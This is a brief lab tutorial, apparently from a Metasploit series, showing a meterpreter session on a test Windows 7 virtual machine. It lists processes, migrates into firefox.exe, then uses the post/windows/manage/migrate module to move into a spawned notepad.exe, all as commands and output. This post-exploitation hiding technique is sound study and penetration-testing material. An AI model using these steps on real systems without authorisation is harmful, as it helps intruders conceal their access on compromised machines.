[MAD-METASPLOIT] 0x31 - Migrate & Hiding process

by hahwul 1 min read

Process Migrate

meterpreter > ps

Process List

PID PPID Name Arch Session User Path — —- —- —- ——- —- —- 0 0 [System Process]
4 0 System x86 0
252 4 smss.exe x86 0 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe 264 472 svchost.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\system32\svchost.exe 324 2716 firefox.exe x86 1 HAHWUL\Test-Virtualbox C:\Program Files\Mozilla Firefox\firefox.exe 328 320 csrss.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 376 320 wininit.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\wininit.exe 384 368 csrss.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\csrss.exe 412 368 winlogon.exe x86 1 NT AUTHORITY\SYSTEM C:\Windows\system32\winlogon.exe 472 376 services.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\services.exe 480 376 lsass.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsass.exe 488 376 lsm.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\lsm.exe 608 472 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\svchost.exe 668 472 VBoxService.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\VBoxService.exe 676 4416 QQPCNetFlow.exe x86 1 HAHWUL\Test-Virtualbox C:\Program Files\Tencent …snip.. 7884 608 Tencentdl.exe x86 1 HAHWUL\Test-Virtualbox C:\program files\common files\tencent\qqdownload\130\tencentdl.exe 8064 472 svchost.exe x86 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\system32\svchost.exe

meterpreter > meterpreter > migrate 324 [] Migrating from 5908 to 324… [] Migration completed successfully.

post 모듈을 이용한 Migrate

meterpreter > run post/windows/manage/migrate [] Running module against HAHWUL [] Current server process: firefox.exe (324) [*] Spawning notepad.exe process to migrate to [+] Migrating to 7428 [+] Successfully migrated to process 7428

meterpreter > ps ..snip.. 7428 324 notepad.exe x86 1 HAHWUL\Test-Virtualbox C:\Windows\system32\notepad.exe ..snip..

meterpreter > sysinfo Computer : HAHWUL OS : Windows 7 (Build 7601, Service Pack 1). Architecture : x86 System Language : ko_KR Domain : WORKGROUP Logged On Users : 1 Meterpreter : x86/windows meterpreter > getuid Server username: HAHWUL\Test-Virtualbox